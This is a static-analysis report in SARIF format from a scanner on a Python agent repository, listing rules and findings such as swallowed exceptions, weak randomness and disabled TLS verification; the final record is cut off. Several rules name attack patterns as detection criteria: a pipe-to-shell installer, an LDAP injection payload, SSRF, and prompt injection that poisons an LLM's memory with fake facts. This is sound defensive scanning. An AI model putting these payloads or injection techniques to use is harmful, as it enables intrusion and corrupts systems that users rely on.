{"version": "2.1.0", "$schema": "https://json.schemastore.org/sarif-2.1.0.json", "runs": [{"tool": {"driver": {"name": "Repobility", "informationUri": "https://repobility.com", "rules": [{"id": "AUC001", "name": "[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobilit", "shortDescription": {"text": "[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation."}, "fullDescription": {"text": "The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation."}, "properties": {"scanner": "repobility-access-control", "category": "auth", "severity": "medium", "confidence": 0.92, "cwe": "CWE-285", "owasp": "WSTG-AUTHZ"}}, {"id": "SEC031", "name": "[SEC031] Catastrophic Backtracking Regex (ReDoS): Regex contains nested quantifiers like `(a+)+` or quantified alternati", "shortDescription": {"text": "[SEC031] Catastrophic Backtracking Regex (ReDoS): Regex contains nested quantifiers like `(a+)+` or quantified alternation with overlapping branches. On adversarial input these patterns exhibit exponential backtracking, freezing the process"}, "fullDescription": {"text": "Three options, pick one:\n 1. Rewrite the pattern to avoid nested quantifiers. E.g. `(a+)+` is functionally equivalent to `a+` for matching purposes.\n 2. Use Google's re2 (`pip install google-re2`): linear-time, drop-in replacement for `re` for most use cases.\n 3. Set a hard timeout: `signal.alarm(1)` before regex eval.\nTest patterns against `safe-regex` or `redos-detector` before shipping."}, "properties": {"scanner": "repobility-threat-engine", "category": "redos", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC136", "name": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns ", "shortDescription": {"text": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns success or no-ops. AI agents reach for this pattern when a flaky test or an unfamiliar API throws \u2014 wrap, swallow, retur"}, "fullDescription": {"text": "Catch the specific exception type, log at error level with full exception info, and return a failure-shaped result. If the operation is genuinely best-effort, log at warning and document why in a comment so the next reader (or scanner) knows."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC015", "name": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable.", "shortDescription": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "fullDescription": {"text": "Use secrets module (Python) or crypto.getRandomValues() (JS) for security-sensitive randomness."}, "properties": {"scanner": "repobility-threat-engine", "category": "crypto", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "ERR001", "name": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG ", "shortDescription": {"text": "[ERR001] Silent Exception Swallowing: Silently swallowing all exceptions hides bugs. Even in cleanup code, log at DEBUG level."}, "fullDescription": {"text": "Log the error: `except Exception: logger.debug('cleanup failed', exc_info=True)`. Or handle specific exception types."}, "properties": {"scanner": "repobility-threat-engine", "category": "error_handling", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "COMP001", "name": "[COMP001] High cognitive complexity: Function `main` has cognitive complexity 18 (SonarSource scale). Cognitive complexi", "shortDescription": {"text": "[COMP001] High cognitive complexity: Function `main` has cognitive complexity 18 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and recursion all weig"}, "fullDescription": {"text": "Extract nested branches into named helper functions; flatten early-return / guard clauses; replace long if/elif chains with dispatch dicts or polymorphism. SonarQube's threshold for 'should refactor' is 15 \u2014 yours is 18."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "medium", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "SEC134", "name": "[SEC134] AI scaffold leftover \u2014 Lorem ipsum / example.com / John Doe in code: Lorem ipsum / John Doe / example.com left ", "shortDescription": {"text": "[SEC134] AI scaffold leftover \u2014 Lorem ipsum / example.com / John Doe in code: Lorem ipsum / John Doe / example.com left in non-test code. AI agents emit these as 'reasonable defaults' when they don't know real values; the human then forgets"}, "fullDescription": {"text": "Move dummy values to fixtures / seed files. In application code, require these to come from config or fail closed. Add a CI grep that rejects 'lorem ipsum' and 'example.com' outside test files."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC087", "name": "[SEC087] JS: weak Math.random for crypto: Math.random() is not cryptographically secure; using it for tokens/keys/nonces", "shortDescription": {"text": "[SEC087] JS: weak Math.random for crypto: Math.random() is not cryptographically secure; using it for tokens/keys/nonces is predictable. Ported from gosec G404 / eslint detect-pseudoRandomBytes concept (Apache-2.0)."}, "fullDescription": {"text": "Use `crypto.randomBytes(32).toString('hex')` (Node) or `crypto.getRandomValues()` (browser)."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "AGT013", "name": "Agent auto-approve or skip-permissions mode is easy to enable", "shortDescription": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "fullDescription": {"text": "Codex/agent auto-approve, YOLO, or skip-permissions modes can be useful in isolated automation, but they remove the human checkpoint before command execution, network access, and file edits."}, "properties": {"scanner": "repobility-agent-runtime", "category": "quality", "severity": "medium", "confidence": 0.68, "cwe": "", "owasp": ""}}, {"id": "MINED111", "name": "Bare except continues silently", "shortDescription": {"text": "Bare except continues silently"}, "fullDescription": {"text": "Bare `except:` (or `except Exception:`) that runs code without re-raising or logging the exception. Hides real failures and makes bugs hard to diagnose."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "TEST002", "name": "Function is stub-only (pass/raise NotImplementedError)", "shortDescription": {"text": "Function is stub-only (pass/raise NotImplementedError)"}, "fullDescription": {"text": "Function declared but body is just pass, return None, raise NotImplementedError, or TODO comment."}, "properties": {"scanner": "repobility", "category": "test_quality", "severity": "medium", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "ERRH002", "name": "Bare except \u2014 overly broad", "shortDescription": {"text": "Bare except \u2014 overly broad"}, "fullDescription": {"text": "AST detector: bare-except-without-pass"}, "properties": {"scanner": "repobility", "category": "error_handling", "severity": "medium", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "CRYP001", "name": "Crypto \u2014 plaintext HTTP for sensitive endpoint", "shortDescription": {"text": "Crypto \u2014 plaintext HTTP for sensitive endpoint"}, "fullDescription": {"text": "Hardcoded http:// (not localhost) for endpoints that handle credentials or data."}, "properties": {"scanner": "repobility", "category": "crypto", "severity": "medium", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "SEC014", "name": "[SEC014] SSL Verification Disabled: SSL certificate verification is disabled, allowing man-in-the-middle attacks.", "shortDescription": {"text": "[SEC014] SSL Verification Disabled: SSL certificate verification is disabled, allowing man-in-the-middle attacks."}, "fullDescription": {"text": "Enable SSL verification. Use verify=True (default) for requests. Pin certificates if needed."}, "properties": {"scanner": "repobility-threat-engine", "category": "crypto", "severity": "medium", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "AGT016", "name": "Codex session log reader may expose prompts or tool-call content", "shortDescription": {"text": "Codex session log reader may expose prompts or tool-call content"}, "fullDescription": {"text": "Codex session JSONL files can contain prompts, tool events, paths, and operational metadata, not only token counts. Token dashboards and exporters should avoid retaining or sharing raw session text."}, "properties": {"scanner": "repobility-agent-runtime", "category": "quality", "severity": "medium", "confidence": 0.73, "cwe": "", "owasp": ""}}, {"id": "AGT015", "name": "Remote install command pipes network code directly to a shell", "shortDescription": {"text": "Remote install command pipes network code directly to a shell"}, "fullDescription": {"text": "Agent helper projects often publish one-line installers. `curl | sh` style commands are convenient, but they bypass review unless the script is pinned, signed, or checksum-verified."}, "properties": {"scanner": "repobility-agent-runtime", "category": "dependency", "severity": "medium", "confidence": 0.7, "cwe": "", "owasp": ""}}, {"id": "AIC003", "name": "Duplicated implementation block across source files", "shortDescription": {"text": "Duplicated implementation block across source files"}, "fullDescription": {"text": "Duplicated blocks are a common artifact when generated code is pasted or recreated instead of reused. They increase maintenance cost because every future bug fix must be found in multiple locations."}, "properties": {"scanner": "repobility-ai-code-hygiene", "category": "quality", "severity": "medium", "confidence": 0.86, "cwe": "", "owasp": ""}}, {"id": "CORE_NO_CI", "name": "No CI/CD configuration found", "shortDescription": {"text": "No CI/CD configuration found"}, "fullDescription": {"text": "Add a CI/CD pipeline: create .github/workflows/ci.yml for GitHub Actions with steps to lint, test, and build on every push and pull request."}, "properties": {"scanner": "repobility-core", "category": "practices", "severity": "medium", "confidence": null, "cwe": "", "owasp": ""}}, {"id": "QUAL004", "name": "Placeholder default username (admin/admin)", "shortDescription": {"text": "Placeholder default username (admin/admin)"}, "fullDescription": {"text": "foo@bar.com / john.doe@example.com / admin/admin / changeme \u2014 typical AI placeholder credentials."}, "properties": {"scanner": "repobility", "category": "quality", "severity": "low", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "AIC002", "name": "Source file name looks like an AI patch artifact", "shortDescription": {"text": "Source file name looks like an AI patch artifact"}, "fullDescription": {"text": "Files named as final, fixed, copy, new, or backup are often temporary patch artifacts. They may be legitimate, but they deserve review before becoming production surface area."}, "properties": {"scanner": "repobility-ai-code-hygiene", "category": "quality", "severity": "low", "confidence": 0.62, "cwe": "", "owasp": ""}}, {"id": "MINED072", "name": "[MINED072] Python Pass Only Class: class Foo: pass \u2014 stub waiting to be filled in.", "shortDescription": {"text": "[MINED072] Python Pass Only Class: class Foo: pass \u2014 stub waiting to be filled in."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-1188 / for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED077", "name": "[MINED077] Python Open No Context: fp = open(path) outside with-block leaks file handles.", "shortDescription": {"text": "[MINED077] Python Open No Context: fp = open(path) outside with-block leaks file handles."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-772 / for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED043", "name": "[MINED043] Http Not Https (and 2 more): Same pattern found in 2 additional files. Review if needed.", "shortDescription": {"text": "[MINED043] Http Not Https (and 2 more): Same pattern found in 2 additional files. Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-319 / A02:2021 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "SEC029", "name": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input (and 16 more): Same pattern found in 16 addi", "shortDescription": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input (and 16 more): Same pattern found in 16 additional files. Review if needed."}, "fullDescription": {"text": "Validate the URL against an allowlist BEFORE fetching:\n ALLOWED = {'images.example.com', 'cdn.example.com'}\n host = urlparse(url).hostname\n if host not in ALLOWED: abort(400)\nOr use a server-side proxy (Imgproxy / serve-files-only-from-S3) that isolates outbound network access from the request handler.\nBlock private CIDRs explicitly: 10/8, 172.16/12, 192.168/16, 169.254/16."}, "properties": {"scanner": "repobility-threat-engine", "category": "ssrf", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED050", "name": "[MINED050] Stub Only Function (and 86 more): Same pattern found in 86 additional files. Review if needed.", "shortDescription": {"text": "[MINED050] Stub Only Function (and 86 more): Same pattern found in 86 additional files. Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-1188 / for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED001", "name": "[MINED001] Bare Except Pass (and 59 more): Same pattern found in 59 additional files. Review if needed.", "shortDescription": {"text": "[MINED001] Bare Except Pass (and 59 more): Same pattern found in 59 additional files. Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-755 / for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED064", "name": "[MINED064] Python Input Call (and 4 more): Same pattern found in 4 additional files. Review if needed.", "shortDescription": {"text": "[MINED064] Python Input Call (and 4 more): Same pattern found in 4 additional files. Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED062", "name": "[MINED062] Python Dataclass No Fields (and 111 more): Same pattern found in 111 additional files. Review if needed.", "shortDescription": {"text": "[MINED062] Python Dataclass No Fields (and 111 more): Same pattern found in 111 additional files. Review if needed."}, "fullDescription": {"text": "Review and fix per the pattern semantics."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED056", "name": "[MINED056] React Key As Index: key={index} in map() \u2014 re-renders the wrong elements on re-order.", "shortDescription": {"text": "[MINED056] React Key As Index: key={index} in map() \u2014 re-renders the wrong elements on re-order."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-682 / for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC128", "name": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake) (and 13 more): Same pattern found in 13 add", "shortDescription": {"text": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake) (and 13 more): Same pattern found in 13 additional files. Review if needed."}, "fullDescription": {"text": "Add `await` before each async call, or chain with `.then`. If you intentionally want fire-and-forget, prefix with `void` (TS) or assign to `_` (Python with `asyncio.create_task`) to make the intent explicit and survive lint."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "SEC016", "name": "[SEC016] LLM Prompt Injection \u2014 User Input in AI Prompt: User-supplied text is interpolated directly into an AI/LLM prom", "shortDescription": {"text": "[SEC016] LLM Prompt Injection \u2014 User Input in AI Prompt: User-supplied text is interpolated directly into an AI/LLM prompt (e.g. OpenAI, Anthropic, or local model). This is the AI equivalent of SQL injection: an attacker can craft input tha"}, "fullDescription": {"text": "1) Separate user content from instructions: use the 'user' role for user text and 'system' role for your instructions \u2014 never concatenate them into one string. 2) Validate and constrain: limit input length, strip control characters, and reject known injection patterns. 3) Use structured output (JSON mode / function calling) so the model returns data, not freeform actions. 4) Apply output validation: check the AI's response before acting on it. 5) Consider a prompt injection detection layer (e.g. Anthropic's constitutional AI, prompt-guard models)."}, "properties": {"scanner": "repobility-threat-engine", "category": "llm_injection", "severity": "info", "confidence": 0.1, "cwe": "", "owasp": ""}}, {"id": "SEC020", "name": "[SEC020] Secret Printed to Logs (and 3 more): Same pattern found in 3 additional files. Review if needed.", "shortDescription": {"text": "[SEC020] Secret Printed to Logs (and 3 more): Same pattern found in 3 additional files. Review if needed."}, "fullDescription": {"text": "Log only redacted, hashed, or last-four-style metadata. Rotate any secret that may have reached logs."}, "properties": {"scanner": "repobility-threat-engine", "category": "credential_exposure", "severity": "info", "confidence": 0.2, "cwe": "", "owasp": ""}}, {"id": "MINED009", "name": "[MINED009] Floats For Money: Variable named price/amount/cost typed as float instead of Decimal.", "shortDescription": {"text": "[MINED009] Floats For Money: Variable named price/amount/cost typed as float instead of Decimal."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-682 / for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC103", "name": "[SEC103] LDAP injection \u2014 non-constant search filter: User input concatenated into an LDAP search filter. Attackers inje", "shortDescription": {"text": "[SEC103] LDAP injection \u2014 non-constant search filter: User input concatenated into an LDAP search filter. Attackers inject `*)(uid=*` style payloads to bypass auth or enumerate accounts."}, "fullDescription": {"text": "Escape with javax.naming.ldap.Rdn.escapeValue or equivalent. For python-ldap, use ldap.filter.escape_filter_chars. Better: use parameterized search APIs (Spring LdapTemplate filter encoders)."}, "properties": {"scanner": "repobility-threat-engine", "category": "injection", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED014", "name": "[MINED014] Disabled Tls Verify: verify=False in requests, rejectUnauthorized:false in node, InsecureSkipVerify:true in G", "shortDescription": {"text": "[MINED014] Disabled Tls Verify: verify=False in requests, rejectUnauthorized:false in node, InsecureSkipVerify:true in Go."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-295 / A02:2021 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED006", "name": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working.", "shortDescription": {"text": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-705 / for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED110", "name": "Blocking call `requests.append` inside async function `test_permission_request_fires_callback`", "shortDescription": {"text": "Blocking call `requests.append` inside async function `test_permission_request_fires_callback`"}, "fullDescription": {"text": "`requests.append` is a synchronous (blocking) call. When invoked inside an `async def` it stalls the event loop, preventing every other coroutine in the process from making progress."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED106", "name": "Phantom test coverage: test_pre_action_invokes_init", "shortDescription": {"text": "Phantom test coverage: test_pre_action_invokes_init"}, "fullDescription": {"text": "Test function `test_pre_action_invokes_init` runs code but contains no assert / expect / should call \u2014 it passes regardless of behaviour. Adds line coverage without verifying anything."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED108", "name": "`self.root` used but never assigned in __init__", "shortDescription": {"text": "`self.root` used but never assigned in __init__"}, "fullDescription": {"text": "Method `test_unbounded_returns_full_file` of class `TestReadFileBytes` reads `self.root`, but no assignment to it exists in __init__ (and no class-level fallback). This raises AttributeError the first time the method runs against an instance."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "QUAL007", "name": "Imported but never used", "shortDescription": {"text": "Imported but never used"}, "fullDescription": {"text": "AST detector: dead-imports"}, "properties": {"scanner": "repobility", "category": "quality", "severity": "high", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "TEST001", "name": "Phantom test coverage \u2014 test files without real assertions", "shortDescription": {"text": "Phantom test coverage \u2014 test files without real assertions"}, "fullDescription": {"text": "Test function that runs code but contains no assert/expect/should \u2014 passes regardless of behaviour."}, "properties": {"scanner": "repobility", "category": "test_quality", "severity": "high", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "ERRH003", "name": "except BaseException \u2014 catches SystemExit/KeyboardInterrupt", "shortDescription": {"text": "except BaseException \u2014 catches SystemExit/KeyboardInterrupt"}, "fullDescription": {"text": "except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working."}, "properties": {"scanner": "repobility", "category": "error_handling", "severity": "high", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "ERRH001", "name": "Bare except: pass \u2014 silent failure", "shortDescription": {"text": "Bare except: pass \u2014 silent failure"}, "fullDescription": {"text": "except: pass or except Exception: pass \u2014 silently swallows everything including KeyboardInterrupt and bugs."}, "properties": {"scanner": "repobility", "category": "error_handling", "severity": "high", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "CRYP006", "name": "Crypto \u2014 TLS verification disabled", "shortDescription": {"text": "Crypto \u2014 TLS verification disabled"}, "fullDescription": {"text": "verify=False in requests, rejectUnauthorized:false in node, InsecureSkipVerify:true in Go."}, "properties": {"scanner": "repobility", "category": "crypto", "severity": "high", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "CONC001", "name": "Concurrency \u2014 blocking call inside asyncio coroutine", "shortDescription": {"text": "Concurrency \u2014 blocking call inside asyncio coroutine"}, "fullDescription": {"text": "requests.get / time.sleep / open().read inside async def \u2014 blocks the event loop."}, "properties": {"scanner": "repobility", "category": "race_condition", "severity": "high", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "SUPC001", "name": "Supply chain \u2014 curl | bash anti-pattern", "shortDescription": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "fullDescription": {"text": "curl ... | sh / bash \u2014 runs unverified network code."}, "properties": {"scanner": "repobility", "category": "supply_chain", "severity": "high", "confidence": 0.85, "cwe": "", "owasp": ""}}, {"id": "SEC004", "name": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. Allows SQL injection.", "shortDescription": {"text": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. Allows SQL injection."}, "fullDescription": {"text": "Use parameterized queries: cursor.execute('SELECT * FROM t WHERE id = %s', [id]). For dynamic table or column names, choose identifiers from a hard-coded allowlist and keep values in parameters."}, "properties": {"scanner": "repobility-threat-engine", "category": "injection", "severity": "high", "confidence": 0.5, "cwe": "", "owasp": ""}}, {"id": "AGT002", "name": "LLM memory extraction can be prompt-injected into storing fake facts", "shortDescription": {"text": "LLM memory extraction can be prompt-injected into storing fake facts"}, "fullDescription": {"text": "Strict-JSON memory extraction from raw user and assistant text can be manipulated by a user message unless extracted facts are schema-validated and filtered before persistence."}, "properties": {"scanner": "repobility-agent-runtime", "category": "llm_injection", "severity": "high", "confidence": 0.82, "cwe": "", "owasp": ""}}, {"id": "MINED107", "name": "Missing import: `stat` used but not imported", "shortDescription": {"text": "Missing import: `stat` used but not imported"}, "fullDescription": {"text": "The file uses `stat.something(...)` but never imports `stat`. This raises NameError at runtime the first time the line executes."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "critical", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SECR001", "name": "Hardcoded secret in source", "shortDescription": {"text": "Hardcoded secret in source"}, "fullDescription": {"text": "API key, AWS access key, password, or private key embedded directly in source. AI assistants frequently leak demo creds."}, "properties": {"scanner": "repobility", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "cwe": "", "owasp": ""}}]}}, "automationDetails": {"id": "repobility/231"}, "properties": {"repository": "agentforce314/clawcodex", "repoUrl": "https://github.com/agentforce314/clawcodex", "branch": "main"}, "results": [{"ruleId": "AUC001", "level": "warning", "message": {"text": "[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation."}, "properties": {"repobilityId": 46516, "scanner": "repobility-access-control", "fingerprint": "f1305052c3ba1e6c1cdb5dccc19e58a8168cf78b176658f32b1fc823df3e9d10", "category": "auth", "severity": "medium", "confidence": 0.92, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"scanner": "repobility-access-control", "frameworks": ["Django"], "expected_files": [".repobility/access.yml", ".repobility/access.yaml", ".repobility/access.json", ".repobility/authorization.yml"], "correlation_key": "fp|f1305052c3ba1e6c1cdb5dccc19e58a8168cf78b176658f32b1fc823df3e9d10"}}}, {"ruleId": "SEC031", "level": "warning", "message": {"text": "[SEC031] Catastrophic Backtracking Regex (ReDoS): Regex contains nested quantifiers like `(a+)+` or quantified alternation with overlapping branches. On adversarial input these patterns exhibit exponential backtracking, freezing the process. CWE-1333. Real CVEs: CVE-2017-16129 (minimatch), CVE-2021-3807 (ansi-regex), and dozens more."}, "properties": {"repobilityId": 46515, "scanner": "repobility-threat-engine", "fingerprint": "30a42cc5c18292780ece921aa3283171aa65e631f869b25161536a24bb9cf4f8", "category": "redos", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "re.compile(r\"^[A-Za-z0-9._-]+(?:/[A-Za-z0-9._-]+)*", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC031", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|30a42cc5c18292780ece921aa3283171aa65e631f869b25161536a24bb9cf4f8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/tools/worktree.py"}, "region": {"startLine": 12}}}]}, {"ruleId": "SEC136", "level": "warning", "message": {"text": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns success or no-ops. AI agents reach for this pattern when a flaky test or an unfamiliar API throws \u2014 wrap, swallow, return success. Real bugs are masked, observability is destroyed, and callers think the operation worked. CWE-396 (improperly-generalized exception). Distinct from intentional fallback because there's no log line and the success value is fabricated."}, "properties": {"repobilityId": 46502, "scanner": "repobility-threat-engine", "fingerprint": "a39274e5f1dafcb73831f29afe1107fed998a205aff99ded1d9916995bd0318a", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "try:\n parts = token.split(\".\")\n if len(parts) < 2:\n return None\n # b", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC136", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|a39274e5f1dafcb73831f29afe1107fed998a205aff99ded1d9916995bd0318a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/mcp/xaa_idp_login.py"}, "region": {"startLine": 142}}}]}, {"ruleId": "SEC136", "level": "warning", "message": {"text": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns success or no-ops. AI agents reach for this pattern when a flaky test or an unfamiliar API throws \u2014 wrap, swallow, return success. Real bugs are masked, observability is destroyed, and callers think the operation worked. CWE-396 (improperly-generalized exception). Distinct from intentional fallback because there's no log line and the success value is fabricated."}, "properties": {"repobilityId": 46501, "scanner": "repobility-threat-engine", "fingerprint": "e6b031bb21444eb4e25295e75dca64660395073e8e10223bbc3a53bccd8d69ac", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "try:\n with open(expanded, \"r\") as f:\n plan_content = f.read()\n except Exception", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC136", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|e6b031bb21444eb4e25295e75dca64660395073e8e10223bbc3a53bccd8d69ac"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/compact/post_compact_attachments.py"}, "region": {"startLine": 252}}}]}, {"ruleId": "SEC136", "level": "warning", "message": {"text": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns success or no-ops. AI agents reach for this pattern when a flaky test or an unfamiliar API throws \u2014 wrap, swallow, return success. Real bugs are masked, observability is destroyed, and callers think the operation worked. CWE-396 (improperly-generalized exception). Distinct from intentional fallback because there's no log line and the success value is fabricated."}, "properties": {"repobilityId": 46500, "scanner": "repobility-threat-engine", "fingerprint": "7c57eaf8fb3fc858c626c964a49950abaf900c6744876473edfb085689455091", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "try:\n with open(HISTORY_FILE, \"r\", encoding=\"utf-8\") as f:\n for line in f:", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC136", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|7c57eaf8fb3fc858c626c964a49950abaf900c6744876473edfb085689455091"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/config.py"}, "region": {"startLine": 246}}}]}, {"ruleId": "SEC015", "level": "warning", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "properties": {"repobilityId": 46495, "scanner": "repobility-threat-engine", "fingerprint": "e2123d27234d75764141e375824d36953863a6d0f5de5b634d96ca2cc2b50ac6", "category": "crypto", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "evidence": {"match": "def create_session", "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|crypto|token|58|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/session_manager.py"}, "region": {"startLine": 58}}}]}, {"ruleId": "SEC015", "level": "warning", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "properties": {"repobilityId": 46494, "scanner": "repobility-threat-engine", "fingerprint": "09883df7e36db9236e8384bf232d7df90bffc89d923ac7fa96b817fadadb75fc", "category": "crypto", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "evidence": {"match": "def create_direct_connect_session", "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|crypto|token|40|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/direct_connect_session.py"}, "region": {"startLine": 40}}}]}, {"ruleId": "SEC015", "level": "warning", 